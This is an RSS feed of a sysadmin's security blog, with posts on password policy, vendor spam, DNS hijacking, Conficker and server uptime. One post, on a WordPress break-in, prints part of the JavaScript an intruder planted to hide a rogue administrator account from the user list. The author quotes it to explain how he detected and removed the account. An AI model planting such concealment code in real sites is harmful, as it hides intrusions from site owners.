<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>/usr/local.com &#187; Security</title>
	<atom:link href="http://usrlocal.com/topics/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://usrlocal.com</link>
	<description>half true, half interesting, mostly BS</description>
	<lastBuildDate>Fri, 23 Jul 2010 04:27:57 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>20%</title>
		<link>http://usrlocal.com/2010/01/20percent/</link>
		<comments>http://usrlocal.com/2010/01/20percent/#comments</comments>
		<pubDate>Sat, 02 Jan 2010 11:00:50 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[SysAdmin]]></category>
		<category><![CDATA[Hosted Exchange]]></category>
		<category><![CDATA[Policy]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=745</guid>
		<description><![CDATA[We launched our Hosted Exchange 2007 Product just over a year ago.  And for the most part, things have gone great.  
One of our early decisions was to balance the security of the system while making the system as user friendly as possible.  Originally, we had a pretty strict password policy.  [...]]]></description>
			<content:encoded><![CDATA[<p>We launched our <a href="http://www.lightedge.com/productsservices/it/exchange_overview.html">Hosted Exchange 2007 Product</a> just over a year ago.  And for the most part, things have gone great.  </p>
<p>One of our early decisions was to balance the security of the system while making the system as user friendly as possible.  Originally, we had a pretty strict password policy.  We soon found that many of our customers were not too happy with this policy and thought it was too much.  Were we out-of-control security freaks?  Shouldn&#8217;t the customer appreciate the steps that we are taking to secure not only our servers, but their information?</p>
<p>Looking around at other vendors, we quickly found that we may be a bit too harsh.  Take Gmail for example.  Sure, it&#8217;s not Exchange.  But then again it has over 100 million users.  If they have had massive issues with security and hacking, they clearly have them under control behind the scenes so things do not get out of hand.  </p>
<p>And have you ever been prompted to change your password on Gmail?  I haven&#8217;t.</p>
<p>So we compromised.  We altered the interval between forced password changes.  We altered the number of passwords that you could recycle.  And we also added a somewhat buried feature in our customer portal.  That feature: &#8216;allow passwords to never expire&#8217;.</p>
<p>Holy crap!  Let&#8217;s just blow a huge freaking hole in the security system, shall we?  </p>
<p>This was a feature that we were not all that happy about, but with the other measures in place we figured we would avoid passwords such as abc123.  It makes the end user happy, and we have some level of security, though not as high and tight as we would like.  But it&#8217;s better than having things wide open.</p>
<p>Now here is the shocking part of this.  20% of our users have this feature enabled.  20-freaking-percent!  I was really hoping for this number to be in the 5-10% range.<br />
  But no, 1 in 5 of our users will never change their password again.</p>
<p>Or will they?</p>
<p>I&#8217;m currently developing a nag script that will send out a reminder to the end users every couple of months.  Not enough to completely annoy the heck out of them, but hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.  </p>
<p>So what do you do for your password policy?  Leave your tips and tricks in the comments section.  We&#8217;d like to hear what you think is an acceptable policy to stay secure!</p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2010/01/20percent/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress Security Concern</title>
		<link>http://usrlocal.com/2009/09/wordpress-security-concern/</link>
		<comments>http://usrlocal.com/2009/09/wordpress-security-concern/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 03:53:11 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[SysAdmin]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=660</guid>
		<description><![CDATA[I&#8217;m not sure if you&#8217;ve applied the latest updates for WordPress but I did last week.  However, it appears that someone got into one of the blogs that I manage and created an account for themselves.  They didn&#8217;t do anything with it, but they DID have full admin access.  I&#8217;m assuming [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m not sure if you&#8217;ve applied the latest updates for <a href="http://wordpress.org/">WordPress</a> but I did last week.  However, it appears that someone got into one of the blogs that I manage and created an account for themselves.  They didn&#8217;t do anything with it, but they DID have full admin access.  I&#8217;m assuming that this was due to a security bug in 2.8.3, as they got in while that version was on the server. </p>
<p>So patch your servers if you haven&#8217;t already!</p>
<p>Here&#8217;s how I noticed that the person had gotten in.  I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site.  However, when I viewed the list, there were only 2 on the page.  Taking a look in the database, I noticed a user with a goofy name for an admin.  And peeking in the wp_usermeta table, I noticed the following value assigned to their first name:</p>
<pre><code>    for (var i = 0; i &lt; tags.length; i++) {
        var t = tags[i].innerHTML;
        var h = tags[i];
        if (t.indexOf(s) &gt; 0) {
            s = (parseInt(t) - 1) + s;
            h.removeChild(h.firstChild);
            t = document.createTextNode(s);
            h.appendChild(t);
        }
    }
    var arr = document.getElementsByTagName("ul");
    for (var i in arr) if (arr[i].className == "subsubsub") {
        var n = /&gt;Administrator \((\d+)\)&lt;/gi.exec(arr[i].innerHTML);
        if (n[1] &gt; 0) {
            var txt = arr[i].innerHTML.replace(/&gt;Administrator \((\d+)\)&lt;/gi, "&gt;Administrator (" + (n[1] - 1) + ")&lt;");
            arr[i].innerHTML = txt;
        }
    }
    } catch (e) {};
};
addLoadEvent(setUserName);
</code></pre>
<p>It&#8217;s not formatted the greatest, but basically, it hides the username from the list.  Nice, eh!  Simply deleting this entry made the user show up in the user list, where I was able to do some auditing before blowing away the user.  </p>
<p>So audit your admin list and patch your servers!  This could have been a lot worse if they had started defacing the site or hiding other gems on there.</p>
<p>-Matt</p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2009/09/wordpress-security-concern/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Verisign Spam</title>
		<link>http://usrlocal.com/2009/07/verisign-spam/</link>
		<comments>http://usrlocal.com/2009/07/verisign-spam/#comments</comments>
		<pubDate>Wed, 22 Jul 2009 05:52:17 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[Rants]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[SysAdmin]]></category>
		<category><![CDATA[Scum Bag]]></category>
		<category><![CDATA[Versign]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=612</guid>
		<description><![CDATA[Some people never learn.  If you spam me, there is a good chance that I WILL mock you on the internet.  Sure my site gets all of 2 readers a week, but they will know how big of a jackass you are.
Here is the spam that I got from Verisign:

&#8212;&#8212; Forwarded Message
From: &#8220;Borgches, [...]]]></description>
			<content:encoded><![CDATA[<p>Some people never learn.  If you spam me, there is a good chance that I WILL mock you on the internet.  Sure my site gets all of 2 readers a week, but they will know how big of a jackass you are.</p>
<p>Here is the spam that I got from <a href="http://www.verisign.com/">Verisign</a>:</p>
<blockquote><p>
&#8212;&#8212; Forwarded Message<br />
From: &#8220;Borgches, Sergio&#8221; <sborgches@verisign.com><br />
Date: Thu, 16 Jul 2009 11:39:24 -0500<br />
To: Webmaster <Webmaster@lightedge.com><br />
Subject: Ineffective EV SSL Certificate on domain: my.lightedge.com</p>
<p>Dear Webmaster</p>
<p>Ineffective EV SSL Certificate on domain: my.lightedge.com</p>
<p>Are you aware that the Extended Validation (EV) SSL Certificate that<br />
you have on your domain does not display the standard EV interface<br />
that your customers are expecting on Firefox 3.5?  </p>
<p>Mozilla launched the latest version of their browser, on 2 July 2009.<br />
 Not only has it won the Guinness World Record for more than a<br />
million downloads in a short time, but Firefox 3 currently accounts<br />
for over 20% of global browser market share.  </p>
<p>Instead of displaying the GREEN address bar, which reassures visitors<br />
that your site is safe and authentic, it is displaying the BLUE<br />
address bar, which means they do not get the full benefit of EV.<br />
(Please see screenshot attached).  </p>
<p>A rapidly growing portion of your Web site visitors are not seeing<br />
the green address bar.  It has shown in research that users look for<br />
the green address bar on the sites with which they transact and that<br />
77% of users will hesitate to complete the transaction on a site that<br />
once had the green address bar but no longer does (TecEd study,<br />
2007).</p>
<p>VeriSign is the leader in EV SSL security and we would like to assist<br />
you to rectify this problem by offering you a replacement EV SSL<br />
Certificate AT NO CHARGE!  Our Extended Validation SSL Certificates<br />
trigger the green bar in Firefox 3.5.  We work closely with the<br />
browser manufacturers to make sure that our customers&#8217; security is<br />
always world class and that there are no interruptions in your online<br />
security.  </p>
<p>To take advantage of this offer, and to make sure that your address<br />
bar is GREEN in all current EV-enabled browsers please contact me and<br />
I&#8217;ll help you switch to VeriSign, the worldwide leader in trusted<br />
Internet communications and commerce.</p>
<p>Yours faithfully</p>
<p>Sergio Borgches<br />
Inside Sales Executive<br />
VeriSign Security Services<br />
sborgches@verisign.com<br />
Toll Free: 866.893.6565 option 1 ext 2296</p></blockquote>
<p>First off Sergio, the webmaster address?  Really?  Like anyone really reads that stuff anymore.  Half the time these go to an admin buried deep in cubeland who has filters that take webmaster, hostmaster and yourmom@domain.com and send them to the bit bucket.  I have these same filters; I&#8217;m that guy!  I just happened to be going through my spam folder (yes, it was caught as spam, Sergio!) when I found this little gem.  I just couldn&#8217;t pass it up.  Here&#8217;s my advice, Sergio: if you really want to get someone&#8217;s attention, you CALL them.  </p>
<p>Now, besides the fact that you didn&#8217;t call, this is a bit like ambulance chasing if you ask me.  And I can&#8217;t say that I really blame you for it, but it still makes you a scum bag.  The issue isn&#8217;t with the certificate.  The certificate is STILL an Extended Validation (EV) certificate that shows up with the green bar in just about every browser out there except for Firefox 3.5.  Why?  Well, it&#8217;s a bug in the browser.  More details can be found <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=474606">here</a>.  If you happen to have a Verisign, Thawte or, I think, GeoTrust certificate, you&#8217;re fine.  This just seems to be an issue with a few providers, GlobalSign being one of those.  But never fear, addons.mozilla.com is also protected by a GlobalSign EV certificate, so they are well aware of this issue.  But instead of taking the high road and just putting out a press release saying that Verisign customers are not affected by the latest EV certificate issues in Firefox 3.5, you took the lowest road of them all and sent out spam spreading fear, uncertainty and doubt.  Way to keep it classy!</p>
<p>So this, Sergio, is why I&#8217;m not going to swing my business over to you.  Sure, you&#8217;re just trying to get a leg up on the competition.  But the methods by which you are doing it make me want to work with GlobalSign even more.</p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2009/07/verisign-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Is there really that much money in it?</title>
		<link>http://usrlocal.com/2009/06/is-there-really-that-much-money-in-it/</link>
		<comments>http://usrlocal.com/2009/06/is-there-really-that-much-money-in-it/#comments</comments>
		<pubDate>Wed, 10 Jun 2009 04:49:32 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[SysAdmin]]></category>
		<category><![CDATA[Ads]]></category>
		<category><![CDATA[Cheap Bastards]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=539</guid>
		<description><![CDATA[Disclaimer: I&#8217;m not a Comcast subscriber, but I play one on TV
Comcast has me scratching my head.  A friend of mine pointed out the following post on the Comcast goofiness.  For a long time now they have been messing with DNS and if you happen to screw up and look up a site [...]]]></description>
			<content:encoded><![CDATA[<p><em>Disclaimer: I&#8217;m not a Comcast subscriber, but I play one on TV</em></p>
<p>Comcast has me scratching my head.  A friend of mine pointed out the following <a href="http://comcastisfuckingwithyourport53traffic.wordpress.com/2009/06/09/no-really/">post</a> on the Comcast goofiness.  For a long time now they have been messing with DNS, and if you happen to screw up and look up a site that does not exist in DNS, you get the Comcast ad page.  Many of the tech savvy folks out there simply got around that by putting up their own caching server or using <a href="http://www.opendns.com/">OpenDNS</a>.  I know I did when I found out that Mediacom started messing with DNS like this.</p>
<p>Apparently they have upped their game by routing all DNS traffic, no matter what, to their servers.  You have no way around this, you WILL use their servers.</p>
<p>I disagree with the first practice of just having a wildcard (*) domain that sends everything misspelled to a certain site of yours.  Now that they have taken this to a new level, I think it is quickly climbing the all-time ranks of dangerous and stupid.</p>
<p>Really, dangerous?  Well, say I&#8217;m a person that has highly questionable morals and decides that the best way to attack a competitive ISP is to go after their DNS servers.  I could try and do some sort of DDoS.  Or, the better, more devious approach is to attempt a DNS cache poisoning on their servers.  It is not always the easiest, but when done properly it can have some pretty devastating effects.  Now, I trust that Comcast has employed some top notch admins over there, so I highly doubt that they are going to let their guard down here, but we&#8217;re all human.  We still make mistakes.</p>
<p>Why is this stupid?  Honestly, do you click on the ads on one of these pages?  Or do you swear to yourself, type it in correctly or load up Google and search for what you really want?  It just seems like a lot of hassle to implement, and all they are really doing is pissing off their customers.  They&#8217;re trying to milk every last cent out of them and the customers are not stupid.  They know what Comcast is trying to do.  They&#8217;re pissed off and eventually they will leave.  </p>
<p>The sad part is, other ISPs have already taken up the first goofy solution that Comcast put in place.  It&#8217;s only a matter of time until more people adopt this new tactic.  For me personally, I&#8217;m going to smack the crap out of the first person that mentions this as a solution that we should deploy.  I set up our DNS servers and I refuse to break the internet.  I also have a higher respect for my customers.  They&#8217;re all intelligent, reasonable, and good looking, right?  </p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2009/06/is-there-really-that-much-money-in-it/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Business as usual</title>
		<link>http://usrlocal.com/2009/05/business-as-usual/</link>
		<comments>http://usrlocal.com/2009/05/business-as-usual/#comments</comments>
		<pubDate>Sun, 31 May 2009 14:06:56 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[Micro$oft]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Stupid People]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=501</guid>
		<description><![CDATA[Over the past couple of years, I have been able to tolerate Microsoft a bit more than I used to.  When your primary income relies on people purchasing Exchange and OCS accounts that you provide the back end provisioning and automation for, you quickly realize where your bread is buttered.     [...]]]></description>
			<content:encoded><![CDATA[<p>Over the past couple of years, I have been able to tolerate Microsoft a bit more than I used to.  When your primary income relies on people purchasing Exchange and OCS accounts that you provide the back end provisioning and automation for, you quickly realize where your bread is buttered.       </p>
<p>But this sort of crap really needs to stop.  Yes, it&#8217;s their operating system.  But that doesn&#8217;t excuse installing add-ons to third-party applications and disabling the uninstall options.  I&#8217;m with the writer of this article: this is a great way to get your customers to not trust you, and precisely the reason I haven&#8217;t had Windows on my desktop for 8 years.</p>
<blockquote><p>A routine security update for a Microsoft Windows component installed on tens of millions of computers has quietly installed an extra add-on for an untold number of users surfing the Web with Mozilla&#8217;s Firefox Web browser.</p>
<p>Earlier this year, Microsoft shipped a bundle of updates known as a &#8220;service pack&#8221; for a programming platform called the Microsoft .NET Framework, which Microsoft and plenty of third-party developers use to run a variety of interactive programs on Windows.</p>
<p>The service pack for the .NET Framework, like other updates, was pushed out to users through the Windows Update Web site. A number of readers had never heard of this platform before Windows Update started offering the service pack for it, and many of you wanted to know whether it was okay to go ahead and install this thing. Having earlier checked to see whether the service pack had caused any widespread problems or interfered with third-party programs &#8212; and not finding any that warranted waving readers away from this update &#8212; I told readers not to worry and to go ahead and install it.</p>
</blockquote>
<p><a href="http://voices.washingtonpost.com/securityfix/2009/05/microsoft_update_quietly_insta.html">source</a></p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2009/05/business-as-usual/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Uptime</title>
		<link>http://usrlocal.com/2009/04/uptime/</link>
		<comments>http://usrlocal.com/2009/04/uptime/#comments</comments>
		<pubDate>Fri, 01 May 2009 04:38:22 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[SysAdmin]]></category>
		<category><![CDATA[Patching]]></category>
		<category><![CDATA[Uptime]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=451</guid>
		<description><![CDATA[Every once in a while one of the LUG lists that I am on decides to have a big dick contest and everyone shows off who has the better uptime.  It&#8217;s actually a way of generating traffic on mailing lists that haven&#8217;t seen any reasonable traffic in a while.   [...]]]></description>
			<content:encoded><![CDATA[<p>Every once in a while one of the <a href="http://en.wikipedia.org/wiki/Linux_User_Group">LUG</a> lists that I am on decides to have a big dick contest and everyone shows off who has the better <a href="http://en.wikipedia.org/wiki/Uptime">uptime</a>.  It&#8217;s actually a way of generating traffic on mailing lists that haven&#8217;t seen any reasonable traffic in a while.  It&#8217;s the same as starting a vi vs emacs flame war.  No one really wins, but it always gets people contributing to the list.</p>
<p>The list started off fairly respectable with a few people putting up some pathetic numbers of 15 days or 30 days.  Someone threw out a 100+ and then someone managed to get a 400+.   I decided it was time to put these folks to shame.  I threw down the following:</p>
<p><code>matt@goober:~> uptime<br />
 03:30:14  up 1041 days, 10:41,  2 users,  load average: 0.00, 0.00, 0.00</code></p>
<p>This is not my record, I have had a DNS server here at work at 1500+.  </p>
<p>As usual, these email threads will bring out the security conscious folks who believe that if you haven&#8217;t updated your kernel, you&#8217;re a bad admin.  I typically argue that if you are relying on only security patches, you&#8217;re probably not a good admin.  It should always be a layered approach!  Some people use Ksplice on their boxes so they can patch the kernel effectively without a reboot.  I don&#8217;t in this instance.</p>
<p>So, as always, I had to describe some of the security features of this box that would convince these people that I&#8217;m not just an ignorant ass.    Here is how I do it.</p>
<p>First off, when I build a box, I install the bare minimum.  This server happens to be a file server.  It doesn&#8217;t need to serve up web pages, so apache is not installed.  It does need to send mail out from its local queue for monit messages, so the SMTP server is locked down by a firewall running on the server, and the SMTP configuration is set to only listen on localhost.  As I stated, the server has a local iptables FW running on it.  It is also protected by a hardware firewall.  I keep the various services the server provides up to date and fully patched.  I load minimal modules in the kernel.  It is the bare bones of what it needs.  Where I can unload, patch and reload a module, I do it.  Other than that, I can ignore this box.</p>
<p>Do I do this for every server that I admin?  No.  At my current job we have the resources where just about every service that I roll out is built in some sort of a high availability cluster.  If I need to take down a node to patch it, I can.  This server that I haven&#8217;t taken down in 2.5 years doesn&#8217;t have that luxury.  It&#8217;s also in California.  So if I had a kernel update go south on me, I would have to walk a buddy through getting it back up&#8230;over the phone.  My buddy has some skills on the computer, but not necessarily a lot of Linux skills.  So imagine walking your mom through the Linux command line.  Scared yet?</p>
<p>I&#8217;m not trying to promote not patching your kernel.  But what I am trying to promote is that in some instances, maybe even in a lot of instances, you can get by with _not_ updating your kernel every time a new one comes out.  It&#8217;s about cost/benefit analysis.  Not many sheeple realize that it is actually a part of their job.  Sometimes you don&#8217;t have $20K to put in a solution that will never go down.  EVER!  Sometimes you have a couple hundred bucks and you need to provide something that is stable, secure, and hassle free.  And that&#8217;s what I have provided, going on 1042 days =)</p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2009/04/uptime/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How the Conficker Problem Just Got Much Worse</title>
		<link>http://usrlocal.com/2009/04/how-the-conficker-problem-just-got-much-worse/</link>
		<comments>http://usrlocal.com/2009/04/how-the-conficker-problem-just-got-much-worse/#comments</comments>
		<pubDate>Sun, 05 Apr 2009 15:20:34 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=395</guid>
		<description><![CDATA[On the surface, April 1 came and went without a peep from the dreaded Conficker megaworm. But security experts see a frightening reality, one where Conficker is now more powerful and more dangerous than ever.
In the first minute of April 1, Conficker did exactly what everyone knew it was going to do: It successfully phoned [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>On the surface, April 1 came and went without a peep from the dreaded Conficker megaworm. But security experts see a frightening reality, one where Conficker is now more powerful and more dangerous than ever.</p>
<p>In the first minute of April 1, Conficker did exactly what everyone knew it was going to do: It successfully phoned home for an update. And while it was fun to imagine what nasty payload that update may have included (it was fun, wasn&#8217;t it?), the result was not outwardly catastrophic; rather than a blueprint for world domination, the update contained instructions on how to dig in even deeper.</p>
<p>&#8220;The worm did exactly what everyone thought it was going to do, which is update itself,&#8221; security expert Dan Kaminsky, who helped develop a widely-used Conficker scanner in the days leading up to April 1, told us. &#8220;The world wants there to be fireworks, or some Ebola-class, computers-exploding-all-over-the-world event or God knows what, but the reality is&#8230;the Conficker developers have cemented their ability to push updates through any fences the good guys have managed to build in February and March.&#8221;</p>
<p>And here&#8217;s why that is deeply, deeply scary. As we explained, Conficker has built a zombie botnet infrastructure by registering hundreds of spam DNS names (askcw.com.ru, and the like), which it then links up and uses as nodes for infected machines to contact for instructions. In its earlier forms, Conficker attempted to register 250 such DNS names per day. But with the third version of the software, the Conficker.c variant which has been floating around for the last month or so, the number of spam DNS takeovers was boosted to 50,000 per day—a number security pros can no longer keep up with.</p></blockquote>
<p><a href="http://i.gizmodo.com/5197148/how-the-conficker-problem-just-got-much-worse">source</a></p>
<p>Yikes!  This paints a pretty scary picture.</p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2009/04/how-the-conficker-problem-just-got-much-worse/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Your privacy at stake&#8230;</title>
		<link>http://usrlocal.com/2009/03/your-privacy-at-stake/</link>
		<comments>http://usrlocal.com/2009/03/your-privacy-at-stake/#comments</comments>
		<pubDate>Fri, 27 Mar 2009 04:12:46 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[In the news]]></category>
		<category><![CDATA[Politics]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Encryption]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Your Rights]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=381</guid>
		<description><![CDATA[
Looks like it might be time to install TrueCrypt for all of my files.   
]]></description>
			<content:encoded><![CDATA[<p><object width="320" height="265"><param name="movie" value="http://www.youtube.com/v/6yPmtQDWZ1s&#038;hl=en&#038;fs=1&#038;rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/6yPmtQDWZ1s&#038;hl=en&#038;fs=1&#038;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="320" height="265"></embed></object></p>
<p>Looks like it might be time to install <a href="http://www.truecrypt.org/">TrueCrypt</a> for all of my files.   </p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2009/03/your-privacy-at-stake/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NSA Snooped on All U.S. Communications</title>
		<link>http://usrlocal.com/2009/01/nsa-snooped-on-all-us-communications/</link>
		<comments>http://usrlocal.com/2009/01/nsa-snooped-on-all-us-communications/#comments</comments>
		<pubDate>Fri, 23 Jan 2009 05:35:30 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[In the news]]></category>
		<category><![CDATA[Politics]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Bush]]></category>
		<category><![CDATA[NSA]]></category>
		<category><![CDATA[Spying]]></category>
		<category><![CDATA[Terrorism]]></category>

		<guid isPermaLink="false">http://usrlocal.com/?p=193</guid>
		<description><![CDATA[Unfortunately, I&#8217;m not shocked by this.  But I&#8217;m still mad as hell about it! [...]]]></description>
			<content:encoded><![CDATA[<p>Unfortunately, I&#8217;m not shocked by this.  But I&#8217;m still mad as hell about it!</p>
<div><iframe height="339" width="425" src="http://www.msnbc.msn.com/id/22425001/vp/28781200#28781200" frameborder="0" scrolling="no"></iframe></div>
<p><a href="http://blog.wired.com/27bstroke6/2009/01/nsa-whistleblow.html">source</a></p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2009/01/nsa-snooped-on-all-us-communications/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Spam Drop!</title>
		<link>http://usrlocal.com/2008/11/spam-drop/</link>
		<comments>http://usrlocal.com/2008/11/spam-drop/#comments</comments>
		<pubDate>Sat, 22 Nov 2008 18:20:01 +0000</pubDate>
		<dc:creator>matt</dc:creator>
				<category><![CDATA[In the news]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Spam Volume Drop]]></category>

		<guid isPermaLink="false">http://matt.usrlocal.com/?p=93</guid>
		<description><![CDATA[Normally when I see articles such as this where spam volumes have dropped between 40-75%, my BS meter starts to peg on high.  But more articles are coming out stating that 500,000 bots have been bagged.  
Surprisingly, we have seen the drop here at the office.  We have a store and forward [...]]]></description>
			<content:encoded><![CDATA[<p>Normally when I see articles such as <a href="http://www.computerworld.com/action/article.do?command=viewArticleBasic&#038;articleId=9119963">this</a> where spam volumes have dropped between 40-75%, my BS meter starts to peg on high.  But more articles are coming out stating that <a href="http://www.computerworld.com/action/article.do?command=viewArticleBasic&#038;articleId=9120727&#038;intsrc=hm_list">500,000 bots have been bagged</a>.  </p>
<p>Surprisingly, we have seen the drop here at the office.  We have a store and forward service and we have various statistical tools to serve us a graph of the volume.  Check this out!</p>
<p><a href='http://matt.usrlocal.com/wp-content/uploads/2008/11/mailgraph.png'><img src="http://matt.usrlocal.com/wp-content/uploads/2008/11/mailgraph.png" alt="" title="mailgraph" width="500" height="159" class="aligncenter size-full wp-image-94" /></a></p>
<p>I didn&#8217;t think it would be a big drop, but one of the other admins pointed that out and we have seen it across all of our store and forward and relay servers.  Attempts by bots and various other servers to try and send mail through our systems have drastically dropped. </p>
<p>What are you seeing?</p>
]]></content:encoded>
			<wfw:commentRss>http://usrlocal.com/2008/11/spam-drop/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
